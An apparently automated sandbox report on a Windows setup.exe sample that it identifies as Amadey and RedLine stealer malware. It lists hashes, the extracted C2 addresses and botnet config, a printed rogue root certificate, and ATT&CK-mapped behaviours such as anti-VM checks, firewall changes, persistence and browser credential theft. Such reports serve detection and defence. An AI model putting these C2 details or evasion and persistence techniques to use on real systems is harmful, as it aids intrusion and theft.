amadey | 952e8649fe47039f20f778310b0591ee83efa659c8bf19c24587e37fe4b14606

Resubmissions

24/03/2025, 14:25

250324-rrkk1s1wb1 10

01/08/2024, 19:36

240801-ybf18avfrq 10

Analysis

max time kernel
67s
max time network
599s
platform
windows11-21h2_x64
resource
win11-20240730-en
resource tags

arch:x64arch:x86image:win11-20240730-enlocale:en-usos:windows11-21h2-x64system
submitted
01/08/2024, 19:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1722448950.190938_setup.exe
Size

2.2MB
MD5

636b4c3770045d8e53c1485ea19f326b
SHA1

dbadc786af04a76114f9f1facb3c007e7b3e2c01
SHA256

952e8649fe47039f20f778310b0591ee83efa659c8bf19c24587e37fe4b14606
SHA512

b498a7b743a3f863998771851ada48e3533598bf156da3c1b9abf430500c4f2a2ede545f25330305c5571235929825edefeddd835f590318e152690b4f5e94a9
SSDEEP

49152:N23muAhf1prFS4Aiy3//QkyM3Pq6ZIiaJKu1AajJQe89:N23muAXs4AKnOCHiYAUQX9

Score

10^/10

amadey redline 0657d1 logsdiller cloud (tg: @logsdillabot)credential_access defense_evasion discovery evasion execution infostealer persistence spyware stealer themida trojan

Malware Config

Extracted

Family

amadey

Version

4.41

Botnet

0657d1

http://185.215.113.19

Attributes

install_dir
0d8f5eb8a7
install_file
explorti.exe
strings_key
6c55a5f34bb433fbd933a168577b1838
url_paths
/Vi9leo/index.php

rc4.plain

Extracted

Family

redline

Botnet

LogsDiller Cloud (TG: @logsdillabot)

51.89.205.200:16395

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey

Modifies firewall policy service 3 TTPs 1 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1"	Board.pif

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 1 IoCs

resource	yara_rule
behavioral2/memory/432-482-0x0000000000400000-0x0000000000452000-memory.dmp	family_redline

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 1596 created 3168	1596	Board.pif	52

Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	NSNUTpqiQk13Z4W878vu7iT9.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	6aOBJMrivSVxUvnkmLabIsdb.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorti.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
5228	powershell.EXE
6612	powershell.exe
7840	powershell.exe
8184	powershell.exe
6564	powershell.exe
6568	powershell.exe

Downloads MZ/PE file

Checks BIOS information in registry 2 TTPs 7 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	6aOBJMrivSVxUvnkmLabIsdb.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	6aOBJMrivSVxUvnkmLabIsdb.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	NSNUTpqiQk13Z4W878vu7iT9.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	NSNUTpqiQk13Z4W878vu7iT9.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PowerExpertNNT.lnk	6aOBJMrivSVxUvnkmLabIsdb.exe

Executes dropped EXE 18 IoCs

pid	Process
1596	Board.pif
1972	Board.pif
3344	6aOBJMrivSVxUvnkmLabIsdb.exe
3372	JbFkuHMjohQtL6R5E8dCZiYU.exe
276	NSNUTpqiQk13Z4W878vu7iT9.exe
4244	dkciQqvxxDhgspXZAsA8DUSl.exe
2708	dkciQqvxxDhgspXZAsA8DUSl.tmp
4472	qualitymp3modifier32_64.exe
4820	Install.exe
4896	qualitymp3modifier32_64.exe
388	explorti.exe
936	Install.exe
1648	xnZKMNANdb1hPj4EMGPfbI7_.exe
1660	P__Aw4a3LTu5pSi0dNAWUXxj.exe
916	FHUBazhrdT8z4K_6_YmZLhw0.exe
4600	SJNGGnasEoZLXpweqgoJX1Tw.exe
1364	ebb8298983.exe
5696	569a0e2a6b.exe

Identifies Wine through registry keys 2 TTPs 2 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1974522869-4251526421-3305193628-1000\Software\Wine	explorti.exe
Key opened	\REGISTRY\USER\S-1-5-21-1974522869-4251526421-3305193628-1000\Software\Wine	NSNUTpqiQk13Z4W878vu7iT9.exe

Indirect Command Execution 1 TTPs 17 IoCs

Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

defense_evasion

Indirect Command Execution

T1202

pid	Process
7416	forfiles.exe
7552	forfiles.exe
6312	forfiles.exe
7056	forfiles.exe
4752	forfiles.exe
5376	forfiles.exe
5404	forfiles.exe
5336	forfiles.exe
3304	forfiles.exe
1456	forfiles.exe
5704	forfiles.exe
5896	forfiles.exe
6324	forfiles.exe
5320	forfiles.exe
5720	forfiles.exe
3452	forfiles.exe
5868	forfiles.exe

Loads dropped DLL 3 IoCs

pid	Process
2708	dkciQqvxxDhgspXZAsA8DUSl.tmp
2796	MSBuild.exe
2796	MSBuild.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Themida packer 9 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral2/files/0x000100000002abea-201.dat	themida
behavioral2/memory/3344-222-0x0000000000490000-0x000000000110E000-memory.dmp	themida
behavioral2/memory/3344-237-0x0000000000490000-0x000000000110E000-memory.dmp	themida
behavioral2/memory/3344-238-0x0000000000490000-0x000000000110E000-memory.dmp	themida
behavioral2/memory/3344-239-0x0000000000490000-0x000000000110E000-memory.dmp	themida
behavioral2/memory/3344-247-0x0000000000490000-0x000000000110E000-memory.dmp	themida
behavioral2/memory/3344-240-0x0000000000490000-0x000000000110E000-memory.dmp	themida
behavioral2/memory/3344-236-0x0000000000490000-0x000000000110E000-memory.dmp	themida
behavioral2/memory/3344-1133-0x0000000000490000-0x000000000110E000-memory.dmp	themida

Unexpected DNS network traffic destination 1 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

description	ioc
Destination IP	91.211.247.248

Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1974522869-4251526421-3305193628-1000\Software\Microsoft\Windows\CurrentVersion\Run\ExtreamFanV6 = "C:\\Users\\Admin\\AppData\\Local\\ExtreamFanV6\\ExtreamFanV6.exe"	6aOBJMrivSVxUvnkmLabIsdb.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1974522869-4251526421-3305193628-1000\Software\Microsoft\Windows\CurrentVersion\Run\569a0e2a6b.exe = "C:\\Users\\Admin\\1000029002\\569a0e2a6b.exe"	explorti.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	6aOBJMrivSVxUvnkmLabIsdb.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
79	iplogger.org
11	iplogger.org

Looks up external IP address via web service 4 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
10	ipinfo.io
11	api.myip.com
26	api.myip.com
29	ipinfo.io

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	Board.pif
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	Board.pif
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	Board.pif
File opened for modification	C:\Windows\System32\GroupPolicy	Board.pif

Enumerates processes with tasklist 1 TTPs 2 IoCs

discovery

Process Discovery

T1057

pid	Process
3744	tasklist.exe
4596	tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs

pid	Process
3344	6aOBJMrivSVxUvnkmLabIsdb.exe
276	NSNUTpqiQk13Z4W878vu7iT9.exe
388	explorti.exe

Suspicious use of SetThreadContext 5 IoCs

description	pid	Process	procid_target
PID 1596 set thread context of 1972	1596	Board.pif	94
PID 1648 set thread context of 3060	1648	xnZKMNANdb1hPj4EMGPfbI7_.exe	117
PID 1660 set thread context of 2796	1660	P__Aw4a3LTu5pSi0dNAWUXxj.exe	121
PID 916 set thread context of 4232	916	FHUBazhrdT8z4K_6_YmZLhw0.exe	130
PID 4600 set thread context of 432	4600	SJNGGnasEoZLXpweqgoJX1Tw.exe	133

Drops file in Windows directory 8 IoCs

description	ioc	Process
File opened for modification	C:\Windows\ProgressiveKings	1722448950.190938_setup.exe
File created	C:\Windows\Tasks\explorti.job	NSNUTpqiQk13Z4W878vu7iT9.exe
File opened for modification	C:\Windows\SystemTemp	chrome.exe
File created	C:\Windows\Tasks\bVxDcMagaMCWGEtnSM.job	schtasks.exe
File opened for modification	C:\Windows\EastTear	1722448950.190938_setup.exe
File opened for modification	C:\Windows\PicApplicant	1722448950.190938_setup.exe
File opened for modification	C:\Windows\MyanmarWarner	1722448950.190938_setup.exe
File opened for modification	C:\Windows\ExperimentalEducational	1722448950.190938_setup.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 4 IoCs

pid	pid_target	Process	procid_target
7096	5696	WerFault.exe	154
1064	7484	WerFault.exe	196
2772	936	WerFault.exe	113
3124	6660	WerFault.exe	292

System Location Discovery: System Language Discovery 1 TTPs 53 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	forfiles.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	569a0e2a6b.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	qualitymp3modifier32_64.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	explorti.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Install.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dkciQqvxxDhgspXZAsA8DUSl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xnZKMNANdb1hPj4EMGPfbI7_.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	forfiles.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NSNUTpqiQk13Z4W878vu7iT9.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	P__Aw4a3LTu5pSi0dNAWUXxj.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	FHUBazhrdT8z4K_6_YmZLhw0.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	forfiles.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ebb8298983.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	qualitymp3modifier32_64.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	JbFkuHMjohQtL6R5E8dCZiYU.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Install.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dkciQqvxxDhgspXZAsA8DUSl.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1722448950.190938_setup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	6aOBJMrivSVxUvnkmLabIsdb.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	forfiles.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	gpupdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	forfiles.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	forfiles.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	choice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SJNGGnasEoZLXpweqgoJX1Tw.exe

Checks processor information in registry 2 TTPs 10 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
5556	timeout.exe
5420	timeout.exe

Enumerates system info in registry 2 TTPs 8 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1974522869-4251526421-3305193628-1000_Classes\Local Settings	firefox.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064	RegAsm.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61	RegAsm.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 12 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4100	schtasks.exe
7552	schtasks.exe
6356	schtasks.exe
5644	schtasks.exe
6308	schtasks.exe
6060	schtasks.exe
1112	schtasks.exe
7972	schtasks.exe
5000	schtasks.exe
704	schtasks.exe
6648	schtasks.exe
4056	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1596	Board.pif
1596	Board.pif
1596	Board.pif
1596	Board.pif
1596	Board.pif
1596	Board.pif
1596	Board.pif
1596	Board.pif
1596	Board.pif
1596	Board.pif
3344	6aOBJMrivSVxUvnkmLabIsdb.exe
3344	6aOBJMrivSVxUvnkmLabIsdb.exe
276	NSNUTpqiQk13Z4W878vu7iT9.exe
276	NSNUTpqiQk13Z4W878vu7iT9.exe
2708	dkciQqvxxDhgspXZAsA8DUSl.tmp
2708	dkciQqvxxDhgspXZAsA8DUSl.tmp
388	explorti.exe
388	explorti.exe
2796	MSBuild.exe
2796	MSBuild.exe
916	FHUBazhrdT8z4K_6_YmZLhw0.exe
916	FHUBazhrdT8z4K_6_YmZLhw0.exe
5584	msedge.exe
5584	msedge.exe
4548	msedge.exe
4548	msedge.exe
3140	chrome.exe
3140	chrome.exe
2796	MSBuild.exe
2796	MSBuild.exe
6564	powershell.exe
6564	powershell.exe
8184	powershell.exe
8184	powershell.exe
432	RegAsm.exe
432	RegAsm.exe
2796	MSBuild.exe
2796	MSBuild.exe
2796	MSBuild.exe
2796	MSBuild.exe
2796	MSBuild.exe
2796	MSBuild.exe
6564	powershell.exe
2796	MSBuild.exe
2796	MSBuild.exe
2796	MSBuild.exe
2796	MSBuild.exe
2796	MSBuild.exe
2796	MSBuild.exe
2796	MSBuild.exe
2796	MSBuild.exe
2796	MSBuild.exe
2796	MSBuild.exe
2796	MSBuild.exe
2796	MSBuild.exe
8184	powershell.exe
3060	RegAsm.exe
3060	RegAsm.exe
3060	RegAsm.exe
3060	RegAsm.exe
3060	RegAsm.exe
3060	RegAsm.exe
3060	RegAsm.exe
3060	RegAsm.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs

pid	Process
4548	msedge.exe
4548	msedge.exe
3140	chrome.exe
3140	chrome.exe
4548	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3744	tasklist.exe
Token: SeDebugPrivilege	4596	tasklist.exe
Token: SeDebugPrivilege	1660	P__Aw4a3LTu5pSi0dNAWUXxj.exe
Token: SeDebugPrivilege	916	FHUBazhrdT8z4K_6_YmZLhw0.exe
Token: SeDebugPrivilege	3060	RegAsm.exe
Token: SeBackupPrivilege	3060	RegAsm.exe
Token: SeSecurityPrivilege	3060	RegAsm.exe
Token: SeSecurityPrivilege	3060	RegAsm.exe
Token: SeSecurityPrivilege	3060	RegAsm.exe
Token: SeSecurityPrivilege	3060	RegAsm.exe
Token: SeShutdownPrivilege	3140	chrome.exe
Token: SeCreatePagefilePrivilege	3140	chrome.exe
Token: SeShutdownPrivilege	3140	chrome.exe
Token: SeCreatePagefilePrivilege	3140	chrome.exe
Token: SeShutdownPrivilege	3140	chrome.exe
Token: SeCreatePagefilePrivilege	3140	chrome.exe
Token: SeShutdownPrivilege	3140	chrome.exe
Token: SeCreatePagefilePrivilege	3140	chrome.exe
Token: SeDebugPrivilege	1044	firefox.exe
Token: SeDebugPrivilege	1044	firefox.exe
Token: SeShutdownPrivilege	3140	chrome.exe
Token: SeCreatePagefilePrivilege	3140	chrome.exe
Token: SeDebugPrivilege	6564	powershell.exe
Token: SeDebugPrivilege	8184	powershell.exe
Token: SeShutdownPrivilege	3140	chrome.exe
Token: SeCreatePagefilePrivilege	3140	chrome.exe
Token: SeDebugPrivilege	432	RegAsm.exe
Token: SeShutdownPrivilege	3140	chrome.exe
Token: SeCreatePagefilePrivilege	3140	chrome.exe
Token: SeIncreaseQuotaPrivilege	7904	WMIC.exe
Token: SeSecurityPrivilege	7904	WMIC.exe
Token: SeTakeOwnershipPrivilege	7904	WMIC.exe
Token: SeLoadDriverPrivilege	7904	WMIC.exe
Token: SeSystemProfilePrivilege	7904	WMIC.exe
Token: SeSystemtimePrivilege	7904	WMIC.exe
Token: SeProfSingleProcessPrivilege	7904	WMIC.exe
Token: SeIncBasePriorityPrivilege	7904	WMIC.exe
Token: SeCreatePagefilePrivilege	7904	WMIC.exe
Token: SeBackupPrivilege	7904	WMIC.exe
Token: SeRestorePrivilege	7904	WMIC.exe
Token: SeShutdownPrivilege	7904	WMIC.exe
Token: SeDebugPrivilege	7904	WMIC.exe
Token: SeSystemEnvironmentPrivilege	7904	WMIC.exe
Token: SeRemoteShutdownPrivilege	7904	WMIC.exe
Token: SeUndockPrivilege	7904	WMIC.exe
Token: SeManageVolumePrivilege	7904	WMIC.exe
Token: 33	7904	WMIC.exe
Token: 34	7904	WMIC.exe
Token: 35	7904	WMIC.exe
Token: 36	7904	WMIC.exe
Token: SeIncreaseQuotaPrivilege	7904	WMIC.exe
Token: SeSecurityPrivilege	7904	WMIC.exe
Token: SeTakeOwnershipPrivilege	7904	WMIC.exe
Token: SeLoadDriverPrivilege	7904	WMIC.exe
Token: SeSystemProfilePrivilege	7904	WMIC.exe
Token: SeSystemtimePrivilege	7904	WMIC.exe
Token: SeProfSingleProcessPrivilege	7904	WMIC.exe
Token: SeIncBasePriorityPrivilege	7904	WMIC.exe
Token: SeCreatePagefilePrivilege	7904	WMIC.exe
Token: SeBackupPrivilege	7904	WMIC.exe
Token: SeRestorePrivilege	7904	WMIC.exe
Token: SeShutdownPrivilege	7904	WMIC.exe
Token: SeDebugPrivilege	7904	WMIC.exe
Token: SeSystemEnvironmentPrivilege	7904	WMIC.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
1596	Board.pif
1596	Board.pif
1596	Board.pif
2708	dkciQqvxxDhgspXZAsA8DUSl.tmp
276	NSNUTpqiQk13Z4W878vu7iT9.exe
1044	firefox.exe
1044	firefox.exe
1044	firefox.exe
1044	firefox.exe
1044	firefox.exe
1044	firefox.exe
1044	firefox.exe
1044	firefox.exe
1044	firefox.exe
1044	firefox.exe
1044	firefox.exe
1044	firefox.exe
1044	firefox.exe
1044	firefox.exe
1044	firefox.exe
1044	firefox.exe
4548	msedge.exe
4548	msedge.exe
4548	msedge.exe
4548	msedge.exe
4548	msedge.exe
4548	msedge.exe
4548	msedge.exe
4548	msedge.exe
4548	msedge.exe
4548	msedge.exe
4548	msedge.exe
4548	msedge.exe
4548	msedge.exe
4548	msedge.exe
4548	msedge.exe
4548	msedge.exe
4548	msedge.exe
1044	firefox.exe
1044	firefox.exe
1044	firefox.exe
1044	firefox.exe
1044	firefox.exe
4548	msedge.exe
4548	msedge.exe
4548	msedge.exe
4548	msedge.exe
4548	msedge.exe
4548	msedge.exe
4548	msedge.exe
4548	msedge.exe
3140	chrome.exe
3140	chrome.exe
